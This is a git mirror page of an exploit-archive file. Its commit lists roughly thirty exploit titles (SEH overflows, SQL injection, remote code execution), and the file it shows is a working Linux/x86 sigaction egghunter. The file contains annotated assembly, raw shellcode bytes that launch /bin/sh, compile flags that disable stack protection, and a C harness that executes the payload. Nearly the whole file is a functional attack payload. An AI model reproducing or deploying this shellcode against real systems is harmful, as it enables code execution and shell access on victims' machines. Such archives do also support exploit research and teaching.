bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/48703.c
Offensive Security e46d9f65ff DB: 2020-07-27 
32 changes to exploits/shellcodes

Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)
Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution
UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
Bludit 3.9.2 - Directory Traversal
LibreHealth 2.0.0 - Authenticated Remote Code Execution
Online Course Registration 1.0 - Unauthenticated Remote Code Execution
elaniin CMS - Authentication Bypass
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
Bio Star 2.8.2 - Local File Inclusion
Webtareas 2.1p - Arbitrary File Upload (Authenticated)
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
Socket.io-file 2.0.31 - Arbitrary File Upload
pfSense 2.4.4-p3 - Cross-Site Request Forgery
Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
Rails 5.0.1 - Remote Code Execution

Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)
Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
2020-07-27 05:02:04 +00:00

75 lines
No EOL
2.9 KiB
C
Raw Blame History

# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
# Author: danf42
# Date: 2020-07-16
# Platform: Linux/x86
/*******************************************************************************
sigaction(2) approach to egghunting as described in the paper
"Safely Searching Process Virtual Address Space" by skape
The shellcode prepares the registers to start the hunting by clearing the
direction flag and setting eax, ecx, and edx to 0
Egg value is 0x50905090
global _start
section .text
_start:
cld ; clear the direction flag
xor ecx, ecx ; clear ecx
mul ecx ; multiply by ecx, zero out eax and edx
IncPage:
or cx, 0xfff ; Align page address
IncAddr:
inc ecx ; Go to next address
push byte 0x43 ; syscall for sigaction()
pop eax ; Put syscall value into EAX
int 0x80 ; call sigaction() to check memory location [ECX]
cmp al, 0xf2 ; Did it return EFAULT, Bad Address
jz IncPage ; Skip page if it returned EFAULT
mov eax, 0x50905090 ; Store EGG in EAX
mov edi, ecx ; Move ECX to EDI for scasd operation
scasd ; Check if [EDI] == EAX then increment EDI
jnz IncAddr ; Increment address if no match
scasd ; Check if [EDI] == EAX then increment EDI
jnz IncAddr ; Increment address if no match
jmp edi ; Jump to EDI (our shellcode) if both eggs are found
POC Shellcode to execute /bin/sh
xor ecx, ecx ; clear ecx
mul ecx ; mutliply eax by 0
push eax ; push eax onto stack
push 0x68732f2f ; push ASCII sh// onto stack
push 0x6e69622f ; push ASCII nib/ onto stack
mov ebx, esp ; push /bin/sh into ebx
mov al, 0xb ; mov 11 into lower byte of eax
int 0x80 ; execute execve syscall
mov al,0x01 ; move 1 into lower byte of each
xor ebx,ebx ; clear ebx
int 0x80 ; execute exit syscall
To Cmpile:
gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
*******************************************************************************/
#include<stdio.h>
#include<string.h>
unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
void main()
{
printf("Egghunter Length: %d\n", strlen(egghunter));
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egghunter;
ret();
}
Reference in a new issue View git blame Copy permalink